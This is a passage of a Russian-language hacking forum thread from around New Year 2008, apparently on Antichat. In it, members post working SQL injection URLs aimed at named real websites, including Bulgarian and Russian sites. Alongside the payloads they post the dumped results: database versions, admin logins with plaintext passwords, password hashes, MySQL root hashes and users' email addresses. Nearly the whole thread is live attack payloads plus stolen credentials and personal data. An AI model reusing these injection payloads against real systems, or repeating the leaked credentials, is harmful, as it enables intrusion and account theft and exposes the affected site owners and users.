Abv.bg - самый крупный почтовый портал Болгарии |
31.12.2007, 21:32
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами:
9865044
Репутация:
205
|
|
Abv.bg - самый крупный почтовый портал Болгарии
У меня, собственно, поддомен:
http://poveche.abv.bg/
Код HTML:
http://poveche.abv.bg/kauza.php?id=-1+UNION+SELECT+1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,10/*&kauza=deca&type=1
4.0.27-log: poveche@localhost: bcaf
Код HTML:
http://poveche.abv.bg/kauza.php?id=-1+UNION+SELECT+1,2,3,4,concat(id,0x3a,username,0x3a,password),6,7,8,9,10+FROM+admins/*&kauza=deca&type=1
1: puhie: puhie05
2: bcaf: 11343910
Админка:
http://www.poveche.net/admin/login.php
С наступающим Новом Годом всех!  |
|
|
31.12.2007, 22:47
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
ipodhacks.com
http://www.ipodhacks.com/article.php?sid=-2456+union+select+1,2,3,4,concat_ws(0x3a,uname,pas s),6,7,8,9,10,11+from+nuke_users
Тому, кто узнает что это за хэш - +мах x2
Таблицы все те же что и в postnuke, хоть двиг немного и переписанный)
Последний раз редактировалось n0ne; 31.12.2007 в 22:50..
|
|
|
|
31.12.2007, 22:51
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Сообщение от n0ne
ipodhacks.com
Тому, кто узнает что это за хэш - +мах x2
Таблицы все те же что и в postnuke, хоть двиг немного и переписанный)
Код:
http://www.ipodhacks.com/article.php?sid=-2456+union+select+1,2,3,4,concat_ws(0x3a,uname,pass),6,7,8,9,10,11+from+nuke_users+limit+2,1
--->Тому, кто узнает что это за хэш
Не совсем понял что ты имел ввиду. Что за хеш? DES
blakespot:i3ecrwMoAq/xc: narnia
Последний раз редактировалось Grey; 31.12.2007 в 22:55..
|
|
|
|
01.01.2008, 20:03
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
ico.brush.ru
http://ico.brush.ru/?cl=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9/*
5.1.11-beta/brush/brush@localhost
Таблицы, где есть столбец password
http://ico.brush.ru/?cl=-1+union+select+1,concat(table_schema,0x3b,table_na me),3,4,5,6,7,8,9+from+information_schema.columns+ where+column_name='password'+limit+18,1/*
alarms;shop_user
bkcbb;ashprojects_users
calibri;users
calibri;users_news
kapitalist;kapitalist_user
luna;admin
mantis;mantis_user_table
mugen;pro_user
mysql;user
nippon;LUM_User
portativ;shop_user
smsina;pro_user
smsina;users
smsina2;pro_user
spbauto;Member
spbauto;pandora_users
starz;mantis_user_table
tvoipolis;pro_user
http://ico.brush.ru/?cl=-1+union+select+1,concat_ws(0x2F,user,password),3,4 ,5,6,7,8,9+from+mysql.user/*
root/*E372920927493C3BCEA6654A14218A59970A3D11
http://ico.brush.ru/?cl=-1+union+select+1,concat_ws(0x2F,login,password),3, 4,5,6,7,8,9+from+luna.admin/*
логин/пароль
123alf/123alf
http://ico.brush.ru/?cl=-1+union+select+1,concat_ws(0x2F,name,password,emai l),3,4,5,6,7,8,9+from+nippon.LUM_User/*
имя/хеш/мейл
Andrey/0134baf25d72d0bdca3d0d1b75e548c1/ye@go.ru
|
|
|
|
01.01.2008, 21:29
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
http://www.avtoclub-ukr.com/?categoryid=-89+union+select+concat(login,0x3a,pass)+from+users/*
не подходят ((( да и вход какойто идиотский пасс и логин через ГЕТ идут
в http://www.avtoclub-ukr.com/admin/ мас не идёт ((
|
|
|
|
01.01.2008, 23:11
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
http://www.avtoclub-ukr.com/?categoryid=-89+union+select+concat(login,0x3a,pass)+from+users/*
не подходят ((( да и вход какойто идиотский пасс и логин через ГЕТ идут
----------------------------------------------------------------------
http://www.myminsk.com/catalog/info.php?id=-3318+union+select+1,2,table_name,4,5,6,7,8,9,0,1,2 ,3,4+from+information_schema.tables/*
5-ая
всё слишком запутано и щас сил нету искать ничо .. вот !
|
|
|
|
02.01.2008, 01:12
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
petrovax.ru
http://www.petrovax.ru/news.php?cat=news&news_id=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),da tabase(),user()),6,7,8,9/*
5.0.45-log/u19982/u19982@10.10.10.203
http://www.petrovax.ru/news.php?cat=news&news_id=-1+union+select+1,2,3,4,concat_ws(0x2F,username,use r_password,user_email,user_icq),6,7,8,9+from+phpbb poly_users+limit+1,1/*
логин/хеш/мейл/уин
jstudio/eb43619b759fe3f50043ed138306490a/vk@design-web.ru/
|
|
|
|
02.01.2008, 14:29
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
http://www.trapeza.ru
http://www.trapeza.ru
http://www.trapeza.ru/news/?news=-325+union+select+1,concat(username,char(58),userpa ss),3,4,5,6,7,8+from+poll_user/*
login/hash/password
admin:d9d1b168eac8f197e0576b56cfc23ece:gfhjkm
|
|
|
|
02.01.2008, 15:12
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами:
9865044
Репутация:
205
|
|
Вот, добрался до клавиатуры, и теперь исполню свой долг:
www.cult.bg
Код HTML:
http://www.cult.bg/ind_dotCult_full.php?id=-68+UNION+SELECT+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&PHPSESSID=b709562
4.1.22-log:root@localhost:cult
Код HTML:
http://www.cult.bg/ind_dotCult_full.php?id=-68+UNION+SELECT+1,2,concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+users+LIMIT+0,1/*&PHPSESSID=b709562
Hacko:breathe
...
Код HTML:
http://www.cult.bg/ind_dotCult_full.php?id=-68+UNION+SELECT+1,2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+mysql.user+LIMIT+0,1/*&PHPSESSID=b709562
root:2fcd4de51aebc612::hq444
Ну что, еще раз с Новым 2008 Годом, всем успехов, радости, удачи, и пейте меньше!  |
|
|
|
02.01.2008, 15:40
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
Помогите, плз.
Я начинающий с скулями, тока количество полей подобрал а дальше чет неидет
http://natasha-fahim.com/project_en.php?id_product=-1+union+select+1,2,3,4,5,6,7,8/*
__________________
BlackHat. MoDL
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
